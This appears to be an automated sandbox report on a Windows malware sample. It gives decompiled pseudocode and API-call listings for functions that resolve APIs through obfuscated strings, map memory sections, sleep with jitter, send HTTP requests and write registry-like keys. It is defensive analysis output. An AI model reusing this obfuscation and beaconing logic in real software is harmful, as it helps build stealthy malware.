APIs

Part of subcall function 004016EE: HeapAlloc.KERNEL32(00000000,?,004019CF,00000030,?,00000000), ref: 004016FA

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401DBA,?,?,?,?,?,00000002,?,?), ref: 00401024
GetProcAddress.KERNEL32(00000000,?), ref: 00401046
GetProcAddress.KERNEL32(00000000,?), ref: 0040105C
GetProcAddress.KERNEL32(00000000,?), ref: 00401072
GetProcAddress.KERNEL32(00000000,?), ref: 00401088
GetProcAddress.KERNEL32(00000000,?), ref: 0040109E

Part of subcall function 00401C90: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,?), ref: 00401CED
Part of subcall function 00401C90: memset.NTDLL ref: 00401D0F

Memory Dump Source

Source File: 00000000.00000002.509572364.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509624717.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.509656267.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 4bf58f2c9000e010b34dfb3cc311ad0f84d7dfccd87215c1a1d7e78e2faa945c
Instruction ID: 703f11fa8a27d996fe27e145a0f2623f1ccbe29c67bd5c4830df0f77db47329d
Opcode Fuzzy Hash: 4bf58f2c9000e010b34dfb3cc311ad0f84d7dfccd87215c1a1d7e78e2faa945c
Instruction Fuzzy Hash: 3F3189B060168A9FD710CF6ACD8486BBBFCEF54344700447AE649EB661EB74EA018F24

Uniqueness

Uniqueness Score: -1.00%

Function 03C4944A, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03C49595: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,048F89D8,03C49478,?,?,?,?,?,?,?,?,?,?,?,03C49478), ref: 03C49662

Part of subcall function 03C44580: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 03C445BD
Part of subcall function 03C44580: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 03C445EE

SysAllocString.OLEAUT32(00000000), ref: 03C494A4
SysAllocString.OLEAUT32(0070006F), ref: 03C494B8
SysAllocString.OLEAUT32(00000000), ref: 03C494CA
SysFreeString.OLEAUT32(00000000), ref: 03C49532
SysFreeString.OLEAUT32(00000000), ref: 03C49541
SysFreeString.OLEAUT32(00000000), ref: 03C4954C

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
String ID:
API String ID: 2831207796-0
Opcode ID: 28d3e8f07821b46bca11d29da798246f23322bbbdec2b7efa436b4aa397cb6f2
Instruction ID: 094088a1746af8e809db09815679971fe1ce16b58d0dbacfa9f52c6d9f04a1d0
Opcode Fuzzy Hash: 28d3e8f07821b46bca11d29da798246f23322bbbdec2b7efa436b4aa397cb6f2
Instruction Fuzzy Hash: 8B415135900609AFDB01EFFCD84469FB7B9AF49310F154565E914EB220DB71DE05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03C44944, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C44944(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E03C41525(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x3c4d2a8; // 0xcaa5a8
					_t1 = _t23 + 0x3c4e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x3c4d2a8; // 0xcaa5a8
					_t2 = _t26 + 0x3c4e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E03C48B22(_t54);
					} else {
						_t30 =  *0x3c4d2a8; // 0xcaa5a8
						_t5 = _t30 + 0x3c4e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x3c4d2a8; // 0xcaa5a8
							_t7 = _t33 + 0x3c4e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x3c4d2a8; // 0xcaa5a8
								_t9 = _t36 + 0x3c4e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x3c4d2a8; // 0xcaa5a8
									_t11 = _t39 + 0x3c4e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E03C45CD1(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x03c44953
0x03c44957
0x03c44a19
0x03c4495d
0x03c4495d
0x03c44962
0x03c44975
0x03c44977
0x03c4497c
0x03c44984
0x03c4498b
0x03c4498d
0x03c44992
0x03c44a11
0x03c44a12
0x03c44994
0x03c44994
0x03c44999
0x03c449a1
0x03c449a3
0x03c449a8
0x00000000
0x03c449aa
0x03c449aa
0x03c449af
0x03c449b7
0x03c449b9
0x03c449be
0x00000000
0x03c449c0
0x03c449c0
0x03c449c5
0x03c449cd
0x03c449cf
0x03c449d4
0x00000000
0x03c449d6
0x03c449d6
0x03c449db
0x03c449e3
0x03c449e5
0x03c449ea
0x00000000
0x03c449ec
0x03c449f2
0x03c449f7
0x03c449fe
0x03c44a03
0x03c44a08
0x00000000
0x03c44a0a
0x03c44a0d
0x03c44a0d
0x03c44a08
0x03c449ea
0x03c449d4
0x03c449be
0x03c449a8
0x03c44992
0x03c44a27

APIs

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,03C434A1,?,00000001,?,?,00000000,00000000), ref: 03C44969
GetProcAddress.KERNEL32(00000000,7243775A), ref: 03C4498B
GetProcAddress.KERNEL32(00000000,614D775A), ref: 03C449A1
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 03C449B7
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 03C449CD
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 03C449E3

Part of subcall function 03C45CD1: NtCreateSection.NTDLL(?,000F001F,?,00000001,?,08000000,00000000,74E04EE0,00000000,00000000,03C44A03), ref: 03C45D2E
Part of subcall function 03C45CD1: memset.NTDLL ref: 03C45D50

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 3012371009-0
Opcode ID: 18c0ef25de8f81a961a156a43dbbeead57fe4d415c24ff799d756d99f0e9462b
Instruction ID: 43c76b1fdfac7b5ff7a6d8135a56b1442a9025ca615c1527033228c54e84e74e
Opcode Fuzzy Hash: 18c0ef25de8f81a961a156a43dbbeead57fe4d415c24ff799d756d99f0e9462b
Instruction Fuzzy Hash: 0C216DB560070AEFD720EF6ADC48E5AF7ECEF083007164566E905DB222E770EE058B64

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401000(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E004016EE(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x403104 + 0x404014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x403104 + 0x404151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E004017CB(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x403104 + 0x404161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x403104 + 0x404174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x403104 + 0x404189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x403104 + 0x40419f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E00401C90(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x0040100e
0x00401012
0x004010d3
0x00401018
0x00401030
0x0040103f
0x00401046
0x00401048
0x0040104d
0x004010cb
0x004010cc
0x0040104f
0x0040105c
0x0040105e
0x00401063
0x00000000
0x00401065
0x00401072
0x00401074
0x00401079
0x00000000
0x0040107b
0x00401088
0x0040108a
0x0040108f
0x00000000
0x00401091
0x0040109e
0x004010a0
0x004010a5
0x00000000
0x004010a7
0x004010ad
0x004010b3
0x004010b8
0x004010bd
0x004010c2
0x00000000
0x004010c4
0x004010c7
0x004010c7
0x004010c2
0x004010a5
0x0040108f
0x00401079
0x00401063
0x0040104d
0x004010e1

APIs

Part of subcall function 004016EE: HeapAlloc.KERNEL32(00000000,?,004019CF,00000030,?,00000000), ref: 004016FA

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401DBA,?,?,?,?,?,00000002,?,?), ref: 00401024
GetProcAddress.KERNEL32(00000000,?), ref: 00401046
GetProcAddress.KERNEL32(00000000,?), ref: 0040105C
GetProcAddress.KERNEL32(00000000,?), ref: 00401072
GetProcAddress.KERNEL32(00000000,?), ref: 00401088
GetProcAddress.KERNEL32(00000000,?), ref: 0040109E

Part of subcall function 00401C90: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,?), ref: 00401CED
Part of subcall function 00401C90: memset.NTDLL ref: 00401D0F

Memory Dump Source

Source File: 00000000.00000002.509572364.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509624717.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.509656267.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: b071192780d30fa37d270c9a6f49c8fb865145641f62670ffd03f1ccc65f9e0a
Instruction ID: 9140f5516d8f6e96bc42ac16d424ff358ba4bbc2604748eb03e792c2eb0f4ca6
Opcode Fuzzy Hash: b071192780d30fa37d270c9a6f49c8fb865145641f62670ffd03f1ccc65f9e0a
Instruction Fuzzy Hash: 0F21BBB060064AAFD710DF6ACD84D6BBBFCEF54344700043AE649EB260DB74EA018F28

Uniqueness

Uniqueness Score: -1.00%

Function 03C42789, Relevance: 9.1, APIs: 6, Instructions: 61
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E03C42789(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t27;
				signed int _t34;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x3c4d238 = _t10;
				if(_t10 != 0) {
					 *0x3c4d1a8 = GetTickCount();
					_t12 = E03C49EBB(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
							_push(0);
							_push(0x13);
							_push(_t23 >> 5);
							_push(_t16);
							L03C4B0CA();
							_t34 = _t14 + _t16;
							_t18 = E03C4122B(_a4, _t34);
							_t19 = 3;
							_t26 = _t34 & 0x00000007;
							Sleep(_t19 << (_t34 & 0x00000007)); // executed
						} while (_t18 == 1);
						if(E03C44D4D(_t26) != 0) {
							 *0x3c4d260 = 1; // executed
						}
						_t12 = E03C42F70(_t27); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x03c42789
0x03c4278f
0x03c42790
0x03c4279c
0x03c427a2
0x03c427a9
0x03c427b9
0x03c427be
0x03c427c5
0x03c427c7
0x03c427cc
0x03c427d2
0x03c427d8
0x03c427e2
0x03c427e6
0x03c427e8
0x03c427ed
0x03c427ee
0x03c427ef
0x03c427f4
0x03c427fa
0x03c42805
0x03c42806
0x03c4280c
0x03c42812
0x03c4281e
0x03c42820
0x03c42820
0x03c4282a
0x03c4282a
0x03c427ab
0x03c427ad
0x03c427ad
0x03c42834

APIs

HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,03C47F25,?), ref: 03C4279C
GetTickCount.KERNEL32 ref: 03C427B0
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,03C47F25,?), ref: 03C427CC
SwitchToThread.KERNEL32(?,00000001,?,?,?,03C47F25,?), ref: 03C427D2
_aullrem.NTDLL(?,?,00000013,00000000), ref: 03C427EF
Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,03C47F25,?), ref: 03C4280C

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID:
API String ID: 507476733-0
Opcode ID: c45995128903418a266dccadc3e018cc1cc01e07d73604e75ae45dd6fff2496a
Instruction ID: 2d53b3108feb795632133e0e44ff081811794b02cead32368043e03fb7643d9d
Opcode Fuzzy Hash: c45995128903418a266dccadc3e018cc1cc01e07d73604e75ae45dd6fff2496a
Instruction Fuzzy Hash: 6311E57BA403007BE324FBB4DC1EB5A7AACDB44350F054529F906CB2D4EBB0ED408660

Uniqueness

Uniqueness Score: -1.00%

Function 03C497F7, Relevance: 9.0, APIs: 6, Instructions: 45
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C497F7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E03C48CFA(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E03C4A85C(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x03c497f7
0x03c49804
0x03c49806
0x03c49869
0x00000000
0x03c49869
0x03c4981e
0x03c49825
0x03c49831
0x03c49836
0x03c4984c
0x03c4985c
0x00000000
0x03c4984e
0x03c4984e
0x03c49855
0x03c49862
0x03c49862
0x03c49862
0x03c49855
0x03c4984c
0x03c49867
0x00000000
0x00000000
0x03c4986d

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,03C4937B,?,?,00000000,00000000), ref: 03C49831
ResetEvent.KERNEL32(?), ref: 03C49836
HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 03C49843
GetLastError.KERNEL32 ref: 03C4984E
GetLastError.KERNEL32(?,?,00000102,03C4937B,?,?,00000000,00000000), ref: 03C49869

Part of subcall function 03C48CFA: lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,03C49816,?,?,?,?,00000102,03C4937B,?,?,00000000), ref: 03C48D06
Part of subcall function 03C48CFA: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,03C49816,?,?,?,?,00000102,03C4937B,?), ref: 03C48D64
Part of subcall function 03C48CFA: lstrcpy.KERNEL32(00000000,00000000), ref: 03C48D74

SetEvent.KERNEL32(?), ref: 03C4985C

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
String ID:
API String ID: 3739416942-0
Opcode ID: 05df7ffa10f550437c7aeb8d600584091dd3478d3362efdec1fe6ac3b6e8be9b
Instruction ID: fe13fc687a6b5d112fcdc700ff39f5e68a2173bb7f546da6a769706c72be3f8d
Opcode Fuzzy Hash: 05df7ffa10f550437c7aeb8d600584091dd3478d3362efdec1fe6ac3b6e8be9b
Instruction Fuzzy Hash: 24016D36101320ABDB31AB3ADC44F1BBAACEF44378F154A25F552D90E0D732DD15EA61

Uniqueness

Uniqueness Score: -1.00%

Function 03C44B2A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E03C44B2A(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x3c4d33c);
					_t91 = 0x80000002;
					L6:
					_t59 = E03C47B3B( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E03C48C52(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E03C48B22(_a8);
						goto L29;
					}
					_t64 =  *0x3c4d278; // 0x48f9c18
					_t16 = _t64 + 0xc; // 0x48f9d3a
					_t65 = E03C47B3B(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d03c4c0, executed
						_t67 = E03C4A38F(_t97,  *_t33, _t91, _a8,  *0x3c4d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0x3c4d2a8; // 0xcaa5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x3c4ea3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x3c4e8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E03C48F85(_t69,  *0x3c4d334,  *0x3c4d338,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x3c4d2a8; // 0xcaa5a8
									_t44 = _t71 + 0x3c4e846; // 0x74666f53
									_t73 = E03C47B3B(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d03c4c0
										E03C44538( *_t47, _t91, _a8,  *0x3c4d338, _a24);
										_t49 = _t101 + 0x10; // 0x3d03c4c0
										E03C44538( *_t49, _t91, _t99,  *0x3c4d330, _a16);
										E03C48B22(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d03c4c0
									E03C44538( *_t40, _t91, _a8,  *0x3c4d338, _a24);
									_t43 = _t101 + 0x10; // 0x3d03c4c0, executed
									E03C44538( *_t43, _t91, _a8,  *0x3c4d330, _a16); // executed
								}
								if( *_t101 != 0) {
									E03C48B22(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d03c4c0, executed
					_t81 = E03C47DDD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d03c4c0
							E03C4A38F(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E03C48B22(_t100);
						_t98 = _a16;
					}
					E03C48B22(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E03C4A789(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x3c4d33c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x03c44b2a
0x03c44b33
0x03c44b3a
0x03c44b3f
0x03c44bac
0x03c44bb2
0x03c44bb7
0x03c44bbe
0x03c44bc3
0x03c44bc8
0x03c44d33
0x03c44d3a
0x03c44d3a
0x03c44d3f
0x03c44d41
0x03c44d41
0x03c44d4a
0x03c44d4a
0x03c44bce
0x03c44bd3
0x03c44bda
0x03c44d29
0x03c44d2c
0x00000000
0x03c44d2c
0x03c44be0
0x03c44be5
0x03c44be8
0x03c44bed
0x03c44bf2
0x03c44c3b
0x03c44c3b
0x03c44c4e
0x03c44c51
0x03c44c58
0x03c44c5e
0x03c44c65
0x03c44c6f
0x03c44c6f
0x03c44c67
0x03c44c67
0x03c44c67
0x03c44c67
0x03c44c91
0x03c44c99
0x03c44cc7
0x03c44ccc
0x03c44cd3
0x03c44cd8
0x03c44cdc
0x03c44d0e
0x03c44cde
0x03c44ceb
0x03c44cee
0x03c44cfe
0x03c44d01
0x03c44d07
0x03c44d07
0x03c44c9b
0x03c44ca8
0x03c44cab
0x03c44cbd
0x03c44cc0
0x03c44cc0
0x03c44d18
0x03c44d24
0x03c44d1a
0x03c44d1d
0x03c44d1d
0x03c44d18
0x03c44c91
0x00000000
0x03c44c58
0x03c44c01
0x03c44c04
0x03c44c0b
0x03c44c11
0x03c44c14
0x03c44c16
0x03c44c22
0x03c44c25
0x03c44c25
0x03c44c2b
0x03c44c30
0x03c44c30
0x03c44c36
0x00000000
0x03c44c36
0x03c44b44
0x00000000
0x03c44b6b
0x03c44b6b
0x03c44b77
0x03c44b8a
0x03c44b90
0x03c44b98
0x00000000
0x03c44b98

APIs

StrChrA.SHLWAPI(03C49900,0000005F,00000000,00000000,00000104), ref: 03C44B5D
lstrcpy.KERNEL32(?,?), ref: 03C44B8A

Part of subcall function 03C47B3B: lstrlen.KERNEL32(?,00000000,048F9C18,00000000,03C45142,048F9E3B,?,?,?,?,?,69B25F44,00000005,03C4D00C), ref: 03C47B42
Part of subcall function 03C47B3B: mbstowcs.NTDLL ref: 03C47B6B
Part of subcall function 03C47B3B: memset.NTDLL ref: 03C47B7D

Part of subcall function 03C44538: lstrlenW.KERNEL32(?,?,?,03C44CF3,3D03C4C0,80000002,03C49900,03C45C8D,74666F53,4D4C4B48,03C45C8D,?,3D03C4C0,80000002,03C49900,?), ref: 03C4455D

Part of subcall function 03C48B22: RtlFreeHeap.NTDLL(00000000,00000000,03C4131A,00000000,?,?,00000000), ref: 03C48B2E

lstrcpy.KERNEL32(?,00000000), ref: 03C44BAC

Strings

(, xrefs: 03C44C0D
\, xrefs: 03C44B90

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: c2864fc4af571d4e942217e80f81e9f892fbe83e16ce020ea2a433e80f17f768
Instruction ID: 54132e7586acd43254cf46b671e43124ad996bb2f460654c7deeed5328c11a91
Opcode Fuzzy Hash: c2864fc4af571d4e942217e80f81e9f892fbe83e16ce020ea2a433e80f17f768
Instruction Fuzzy Hash: 3A514C79500209EFDF25EFA1DD44FAA7BBAFF04200F268554F912DA164EB31DA25AB10

Uniqueness

Uniqueness Score: -1.00%

Function 03C41128, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E03C41128(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x3c4d32c; // 0x48f95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x3c4d32c; // 0x48f95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x3c4d030) {
					HeapFree( *0x3c4d238, 0, _t8);
				}
				_t9 = E03C44A2A(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x3c4d32c; // 0x48f95b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}

0x03c41128
0x03c41128
0x03c41131
0x03c41141
0x03c41141
0x03c41146
0x03c4114b
0x00000000
0x00000000
0x03c4113b
0x03c4113b
0x03c4114d
0x03c41151
0x03c41163
0x03c41163
0x03c4116e
0x03c41173
0x03c41176
0x03c4117b
0x03c4117f
0x03c41185

APIs

RtlEnterCriticalSection.NTDLL(048F9570), ref: 03C41131
Sleep.KERNEL32(0000000A,?,03C430F3), ref: 03C4113B
HeapFree.KERNEL32(00000000,00000000,?,03C430F3), ref: 03C41163
RtlLeaveCriticalSection.NTDLL(048F9570), ref: 03C4117F

Strings

Ut, xrefs: 03C41163

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Ut
API String ID: 58946197-8415677
Opcode ID: 82419f256f520b0c41f03777275c3a22a397bb9f77eaaeee5fdb14a3b8341fe3
Instruction ID: 39f08bd0ff834dd1a8ca87e3c45d12ef58b815a5b22ac652681d7cbe281ebd76
